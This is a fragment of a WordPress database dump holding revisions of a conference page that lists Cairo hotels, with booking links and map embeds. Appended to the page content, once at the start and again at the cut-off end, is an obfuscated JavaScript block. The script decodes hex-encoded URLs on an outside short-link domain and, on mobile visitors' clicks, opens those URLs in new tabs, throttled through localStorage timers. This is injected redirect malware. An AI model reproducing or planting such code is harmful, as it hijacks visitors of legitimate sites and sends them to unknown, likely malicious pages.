_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 00:59:30','2023-06-24 00:59:30','',2685,'https://gsw2023.com/?p=4784',0,'revision','',0),
(4785,1,'2023-06-24 01:00:48','2023-06-24 01:00:48','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4783\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 